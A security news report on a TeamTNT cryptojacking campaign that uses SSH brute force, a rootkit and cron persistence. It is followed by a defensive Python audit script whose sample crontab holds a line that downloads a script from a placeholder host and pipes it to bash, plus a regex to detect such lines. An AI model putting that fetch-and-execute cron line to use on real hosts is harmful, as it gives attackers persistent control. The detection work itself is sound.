New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

The cryptojacking operation known as TeamTNT has likely returned as part of a new effort targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.

"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le Phuong stated in a Wednesday study.

The malicious script, the Singaporean cybersecurity company said, is responsible for disabling security measures, erasing logs, terminating bitcoin mining activities, and impeding recovery attempts.

The attack chain ultimately paves the way for deploying the Diamorphine rootkit to hide malicious processes, while also setting up persistent remote access to the infected system.

The campaign has been attributed to TeamTNT with moderate confidence, based on overlaps in the tactics, techniques, and procedures (TTPs) observed.

TeamTNT was first observed in the wild in 2019, conducting illicit cryptocurrency mining by breaking into cloud and container environments. Although the threat actor bowed out in November 2021 with a claimed "clean quit," public reporting has documented multiple campaigns launched by the group since September 2022.

The latest activity attributed to the group takes the form of a shell script that first checks whether the host was previously infected by earlier cryptojacking activity, after which it degrades host security by disabling SELinux, AppArmor, and the firewall.

"The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service," the researchers claimed. "If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service."

Besides killing any competing cryptocurrency mining processes, the script runs a series of commands to delete traces left by other miners, stop containerized processes, and remove container images associated with coin miners.

Furthermore, it achieves persistence by creating cron jobs that download the shell script every 30 minutes from a remote server (65.108.48[.]150) and by modifying the "/root/.ssh/authorized_keys" file to add a backdoor account.

"It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities," the researchers stated. "The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration."
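The persistence and lockdown behaviours described above (periodic cron download, an added SSH key, file attributes changed) are things a defender can audit for on a CentOS host. The following is an added example, not code from the Group-IB report or from the campaign itself; it runs three checks over constructed sample inputs (a crontab, an authorized_keys file and lsattr output, with a TEST-NET placeholder address rather than the campaign's server) and returns the suspicious findings.

```python
import re
from typing import List

# Constructed sample inputs standing in for a host's crontab, authorized_keys
# and `lsattr` output; 203.0.113.10 is a TEST-NET placeholder, not an IoC.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/30 * * * * curl -fsSL http://203.0.113.10/a.sh | bash
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleBaselineKey admin@mgmt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCExampleUnknownKey root@unknown
"""
SAMPLE_LSATTR = """\
--------------e------- /root/.ssh/known_hosts
----i---------e------- /root/.ssh/authorized_keys
"""
# Key blobs an administrator has approved (constructed baseline).
BASELINE_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleBaselineKey"}

# Minute field "*/N" (run every N minutes) followed by four more schedule
# fields, then a command that fetches with curl/wget and pipes into a shell.
CRON_FETCH_EXEC = re.compile(
    r"^\*/\d+\s+(\S+\s+){4}.*\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Cron lines that periodically download a script and execute it."""
    return [ln for ln in crontab_text.splitlines() if CRON_FETCH_EXEC.search(ln)]


def unknown_authorized_keys(keys_text: str, baseline: set) -> List[str]:
    """authorized_keys lines whose key blob is not in the approved baseline."""
    found = []
    for ln in keys_text.splitlines():
        parts = ln.split()
        if len(parts) >= 2 and parts[1] not in baseline:
            found.append(ln)
    return found


def immutable_files(lsattr_text: str) -> List[str]:
    """Paths carrying the immutable ('i') attribute in lsattr output."""
    out = []
    for ln in lsattr_text.splitlines():
        flags, _, path = ln.partition(" ")
        if "i" in flags:
            out.append(path)
    return out


if __name__ == "__main__":
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
    print(unknown_authorized_keys(SAMPLE_AUTHORIZED_KEYS, BASELINE_KEYS))
    print(immutable_files(SAMPLE_LSATTR))
```

On a live host the same functions can be fed the output of `crontab -l`, the contents of `/root/.ssh/authorized_keys` and `lsattr /root/.ssh/*`; an immutable authorized_keys file that the administrator did not set is worth investigating on its own.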
